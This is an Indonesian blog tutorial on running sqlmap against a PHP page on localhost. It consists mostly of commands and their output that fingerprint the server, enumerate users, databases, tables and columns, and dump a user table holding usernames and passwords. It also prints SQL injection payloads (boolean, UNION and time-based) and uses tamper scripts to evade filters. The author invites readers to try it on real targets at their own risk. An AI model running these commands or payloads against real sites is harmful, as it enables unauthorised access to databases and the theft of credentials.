Aksi Penetrasi
Sebelum kita melakukan Uji Coba terhadap tools ini, sebaiknya Downloads dulu toolsnya di Di Sini, kemudian Extrak, asumsi python telah terintstall, disini saya menggunakan Linux, jika anda menggunakn windows, silahkan download python untuk windows dan install, kemudian letakan sqlmap satu directory dengan tempat install pythonUntuk menjalakan sqlmap cukup simple, cukup dengan memberikan perintah seperti $ python sqlmap.py maka secara otomatis sqlmap akan berjalan (bukan untuk exploitasi) hanya sekedar memeriksa apakah sudah bisa berjalan dengan baik atau tidak, untuk melihat opsi-opsi yang ada pada sqlmap bisa menggunakan perintah -h misalnya seperti $ python sqlmap.py -h maka layar command anda akan tampil deretan opsi-opsi yang bisa digunakan
Uji coba kali ini saya lakukan di komputer lokal, (bukan target asli) anda bisa mencobanya dengan target asli, tetapi resiko tanggung sendiri (UUITE) sudah jalan sekarang, so mendingan di lokal biar lebih aman, kan hanya untuk sekedar belajar
Target saya beralamat di http://127.0.0.1/hantu.php?id=1 , untuk itu jalankan sqlmap, dan ikuti langkah berikut ini
Melakukan Fingerprinting (-f)
1
| khairu@goblox:~/Desktop/sqlmap$ python sqlmap.py -f -u http: //127.0.0.1/hantu.php?id=1 |
1
| khairu@goblox:~/Desktop/sqlmap$ python sqlmap.py -f -u http: //127.0.0.1/hantu.php?id=1 |
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
| sqlmap/0.9 - automatic SQL injection and database takeover tool http: //sqlmap.sourceforge.net [*] starting at: 22:54:00 [22:54:00] [INFO] using '/home/khairu/Desktop/sqlmap/output/127.0.0.1/session' as session file [22:54:00] [INFO] testing connection to the target url [22:54:00] [INFO] testing if the url is stable, wait a few seconds [22:54:01] [INFO] url is stable [22:54:01] [INFO] testing if GET parameter 'id' is dynamic [22:54:01] [INFO] confirming that GET parameter 'id' is dynamic [22:54:02] [INFO] GET parameter 'id' is dynamic [22:54:02] [INFO] heuristic test shows that GET parameter 'id' might be injectable (possible DBMS: MySQL) [22:54:02] [INFO] testing sql injection on GET parameter 'id' [22:54:02] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause' [22:54:03] [INFO] GET parameter 'id' is 'AND boolean-based blind - WHERE or HAVING clause' injectable [22:54:03] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause' [22:54:03] [INFO] testing 'MySQL > 5.0.11 stacked queries' [22:54:03] [INFO] testing 'MySQL > 5.0.11 AND time-based blind' [22:54:13] [INFO] GET parameter 'id' is 'MySQL > 5.0.11 AND time-based blind' injectable [22:54:13] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns' [22:54:14] [INFO] target url appears to be UNION injectable with 6 columns [22:54:14] [INFO] GET parameter 'id' is 'MySQL UNION query (NULL) - 1 to 10 columns' injectable GET parameter 'id' is vulnerable. Do you want to keep testing the others? [y/N] |
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
| sqlmap identified the following injection points with a total of 27 HTTP(s) requests: --- Place: GET Parameter: id Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: id=1 ' AND 9766=9766 AND ' eozw '=' eozw Type: UNION query Title: MySQL UNION query (NULL) - 1 to 10 columns Payload: id=1 '
UNION ALL SELECT NULL, NULL, NULL, NULL,
CONCAT(CHAR(58,108,102,110,58),IFNULL(CAST(CHAR(90,108,100,67,103,114,118,81,113,110)
AS CHAR),CHAR(32)),CHAR(58,104,107,118,58)), NULL# AND ' FznP '=' FznP Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: id=1 ' AND SLEEP(5) AND ' iqxY '=' iqxY --- [22:59:52] [INFO] testing MySQL [22:59:52] [INFO] confirming MySQL [22:59:52] [INFO] the back- end DBMS is MySQL [22:59:52] [INFO] actively fingerprinting MySQL [22:59:52] [INFO] executing MySQL comment injection fingerprint web application technology: Apache 2.2.12, PHP 5.3.0 back- end DBMS: active fingerprint: MySQL >= 5.1.12 and < 5.5.0 comment injection fingerprint: MySQL 5.1.37 html error message fingerprint: MySQL [22:59:57] [INFO] Fetched data logged to text files under '/home/khairu/Desktop/sqlmap/output/127.0.0.1' [*] shutting down at: 22:59:57 |
Banner Server (-b)
1
| khairu@goblox:~/Desktop/sqlmap$ python sqlmap.py -b -u http: //127.0.0.1/hantu.php?id=1 |
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
| khairu@goblox:~/Desktop/sqlmap$ python sqlmap.py -b -u http: //127.0.0.1/hantu.php?id=1 sqlmap/0.9 - automatic SQL injection and database takeover tool http: //sqlmap.sourceforge.net [*] starting at: 23:05:03 Place: GET Parameter: id Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: id=1 ' AND 3649=3649 AND ' dXpp '=' dXpp Type: UNION query Title: MySQL UNION query (NULL) - 1 to 10 columns Payload: id=1 '
UNION ALL SELECT NULL, NULL, NULL, NULL,
CONCAT(CHAR(58,103,120,104,58),IFNULL(CAST(CHAR(120,74,71,107,101,90,74,115,98,106)
AS CHAR),CHAR(32)),CHAR(58,100,119,103,58)), NULL# AND ' oHTN '=' oHTN Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: id=1 ' AND SLEEP(5) AND ' MCtM '=' MCtM --- [23:05:24] [INFO] the back- end DBMS is MySQL [23:05:24] [INFO] fetching banner web application technology: Apache 2.2.12, PHP 5.3.0 back- end DBMS: MySQL 5.0.11 banner: '5.1.37' |
Mencari Informasi Server
Disini Kita akan mencari tau nama user, password, dan nama database yang ada
1
| khairu@goblox:~/Desktop/sqlmap$ python sqlmap.py --current-user --current-db --users --password -u http: //127.0.0.1/hantu.php?id=1 |
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
| sqlmap/0.9 - automatic SQL injection and database takeover tool http: //sqlmap.sourceforge.net [*] starting at: 23:16:58 web application technology: Apache 2.2.12, PHP 5.3.0 back- end DBMS: MySQL 5.0.11 [23:16:58] [INFO] fetching current user current user: 'root@localhost' [23:16:58] [INFO] fetching current database current database: 'blog' [23:16:58] [INFO] fetching database users database management system users [5]: [*] '' @ 'linux' [*] '' @ 'localhost' [*] 'pma' @ 'localhost' [*] 'root' @ 'linux' [*] 'root' @'localhost |
mencari semua database
disini kita akan mencari semua database yang ada dalam server target
1
| khairu@goblox:~/Desktop/sqlmap$ python sqlmap.py --dbs -u http: //127.0.0.1/hantu.php?id=1 |
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
| sqlmap/0.9 - automatic SQL injection and database takeover tool http: //sqlmap.sourceforge.net [*] starting at: 23:20:22 --- Place: GET Parameter: id Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: id=1 ' AND 3649=3649 AND ' dXpp '=' dXpp Type: UNION query Title: MySQL UNION query (NULL) - 1 to 10 columns Payload: id=1 '
UNION ALL SELECT NULL, NULL, NULL, NULL,
CONCAT(CHAR(58,103,120,104,58),IFNULL(CAST(CHAR(120,74,71,107,101,90,74,115,98,106)
AS CHAR),CHAR(32)),CHAR(58,100,119,103,58)), NULL# AND ' oHTN '=' oHTN Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: id=1 ' AND SLEEP(5) AND ' MCtM '=' MCtM --- [23:20:23] [INFO] the back- end DBMS is MySQL web application technology: Apache 2.2.12, PHP 5.3.0 back- end DBMS: MySQL 5.0.11 [23:20:23] [INFO] fetching database names available databases [10]: [*] bkd_database [*] blog [*] cdcol [*] gaji_db [*] information_schema [*] mybb [*] mysql [*] northwind [*] phpmyadmin [*] test [23:20:23] [INFO] Fetched data logged to text files under '/home/khairu/Desktop/sqlmap/output/127.0.0.1' [*] shutting down at: 23:20:23 |
Mencari current tabel dan kolom
Disini kita akan mencari tabel dan kolom yang ada pada current database yang sudah kita temukan sebelumnya, dengan memberikan nama tabel pada option yang ada
1
| khairu@goblox:~/Desktop/sqlmap$ python sqlmap.py --tables -D gaji_db -u http: //127.0.0.1/hantu.php?id=1 -v 0 |
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
| sqlmap/0.9 - automatic SQL injection and database takeover tool http: //sqlmap.sourceforge.net [*] starting at: 23:26:22 sqlmap identified the following injection points with a total of 0 HTTP(s) requests: --- Place: GET Parameter: id Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: id=1 ' AND 3649=3649 AND ' dXpp '=' dXpp Type: UNION query Title: MySQL UNION query (NULL) - 1 to 10 columns Payload: id=1 '
UNION ALL SELECT NULL, NULL, NULL, NULL,
CONCAT(CHAR(58,103,120,104,58),IFNULL(CAST(CHAR(120,74,71,107,101,90,74,115,98,106)
AS CHAR),CHAR(32)),CHAR(58,100,119,103,58)), NULL# AND ' oHTN '=' oHTN Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: id=1 ' AND SLEEP(5) AND ' MCtM '=' MCtM --- web application technology: Apache 2.2.12, PHP 5.3.0 back- end DBMS: MySQL 5.0.11 [23:26:22] [INFO] read from file '/home/khairu/Desktop/sqlmap/output/127.0.0.1/session' :
gaji_db, tb_cuti, gaji_db, tb_cuti, gaji_db, tb_gaji, gaji_db, tb_gaji,
gaji_db, tb_jabatan, gaji_db, tb_jabatan, gaji_db, tb_karyawan,
gaji_db, tb_karyawan, gaji_db, tb_user, gaji_db, tb_user Database: gaji_db [5 tables] +-------------+ | tb_cuti | | tb_gaji | | tb_jabatan | | tb_karyawan | | tb_user | +-------------+ [*] shutting down at: 23:26:22 |
1
| khairu@goblox:~/Desktop/sqlmap$ python sqlmap.py --columns -T tb_user -D gaji_db -u http: //127.0.0.1/hantu.php?id=1 -v 0 |
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
| sqlmap/0.9 - automatic SQL injection and database takeover tool http: //sqlmap.sourceforge.net [*] starting at: 23:28:49 sqlmap identified the following injection points with a total of 0 HTTP(s) requests: --- Place: GET Parameter: id Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: id=1 ' AND 3649=3649 AND ' dXpp '=' dXpp Type: UNION query Title: MySQL UNION query (NULL) - 1 to 10 columns Payload: id=1 '
UNION ALL SELECT NULL, NULL, NULL, NULL,
CONCAT(CHAR(58,103,120,104,58),IFNULL(CAST(CHAR(120,74,71,107,101,90,74,115,98,106)
AS CHAR),CHAR(32)),CHAR(58,100,119,103,58)), NULL# AND ' oHTN '=' oHTN Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: id=1 ' AND SLEEP(5) AND ' MCtM '=' MCtM --- web application technology: Apache 2.2.12, PHP 5.3.0 back- end DBMS: MySQL 5.0.11 Database: gaji_db Table: tb_user [3 columns] +----------+-------------+ | Column | Type | +----------+-------------+ | id_user | int(1) | | password | varchar(32) | | username | varchar(10) | +----------+-------------+ [*] shutting down at: 23:28:50 |
Dump
Hasil akhir dari aksi penetrasi tentu saja berujung pada informasi yang diperoleh, dumping data merupakan salah satu contoh saja, dumping merupkan sebuah kegiatan dimana attacker membaca semua informasi yang ada dalam sebuah tabel yang nama tabel dan kolomnya sudah diketahui
1
| khairu@goblox:~/Desktop/sqlmap$ python sqlmap.py --dump -C password,username -T tb_user -D gaji_db -u http: //127.0.0.1/hantu.php?id=1 -v 0 |
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
| sqlmap/0.9 - automatic SQL injection and database takeover tool http: //sqlmap.sourceforge.net [*] starting at: 23:32:57 sqlmap identified the following injection points with a total of 0 HTTP(s) requests: --- Place: GET Parameter: id Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: id=1 ' AND 3649=3649 AND ' dXpp '=' dXpp Type: UNION query Title: MySQL UNION query (NULL) - 1 to 10 columns Payload: id=1 '
UNION ALL SELECT NULL, NULL, NULL, NULL,
CONCAT(CHAR(58,103,120,104,58),IFNULL(CAST(CHAR(120,74,71,107,101,90,74,115,98,106)
AS CHAR),CHAR(32)),CHAR(58,100,119,103,58)), NULL# AND ' oHTN '=' oHTN Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: id=1 ' AND SLEEP(5) AND ' MCtM '=' MCtM --- web application technology: Apache 2.2.12, PHP 5.3.0 back- end DBMS: MySQL 5.0.11 Database: gaji_db Table: tb_user [2 entries] +----------+----------+ | password | username | +----------+----------+ | 123 | 123 | | admin | admin | +----------+----------+ [*] shutting down at: 23:32:58 |
The Simple Way
untuk mencari tau versi, jenis, user, password hash dari target mysql injection bisa melalui beberapa cara
1
| khairu@goblox:~/Desktop/sqlmap$ python sqlmap.py -f -b --current-user --current-db --dbs --users --password -u http: //127.0.0.1/hantu.php?id=1 -v 0 |
1
| khairu@goblox:~/Desktop/sqlmap$
python sqlmap.py -f -b --current-user --current-db --dbs --users
--password --tables --dump-all -u http: //127.0.0.1/hantu.php?id=1 -v 0 |
1
2
3
4
5
6
7
8
9
10
| Database: cdcol Table: cds [3 entries] +----+------------------+------+-----------------------------------+ | id | interpret | jahr | titel | +----+------------------+------+-----------------------------------+ | 1 | Ryuichi Sakamoto | 1990 | Beauty | | 4 | Groove Armada | 2001 | Goodbye Country (Hello Nightclub) | | 5 | Bran Van 3000 | 1997 | Glee | +----+------------------+------+-----------------------------------+ |
1
| khairu@goblox:~/Desktop/sqlmap$ python sqlmap.py -f -b --dbs -u http: //localhost/hantu.php?id=1 --tamper \ tamper/between.py,tamper/randomcase.py,tamper/space2comment.py -v 3 |
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
| web application technology: Apache 2.2.12, PHP 5.3.0 back- end DBMS: active fingerprint: MySQL >= 5.1.12 and < 5.5.0 html error message fingerprint: MySQL banner: '5.1.37' [23:49:08] [INFO] fetching database names [23:49:08] [PAYLOAD] 1 '/**/UnIon/**/aLl/**/SeLecT/**/NulL,/**/NulL,/**/CONCAT(ChAR(58,112,106,104,58),IFNulL(cAst(schema_name/**/As/**/ChAR),ChAR(32)),ChAR(58,107,109,105,58)),/**/NulL,/**/NulL,/**/NulL/**/FROM/**/information_schema.SCHEMATA#/**/and/**/' DOPd '=' DOPd [23:49:08] [DEBUG] performed 1 queries in 0 seconds available databases [10]: [*] bkd_database [*] blog [*] cdcol [*] gaji_db [*] information_schema [*] mybb [*] mysql [*] northwind [*] phpmyadmin [*] test [*] shutting down at: 23:49:08 |
1 komentar:
mas cara membuat website biar ada dork php?id=1 nya gimana ya?
Posting Komentar
biasakan berkomentar di saat blogwalking. karna dengan berkomentar kita dapat menaikan pagerank serta menambah baclink ke website kita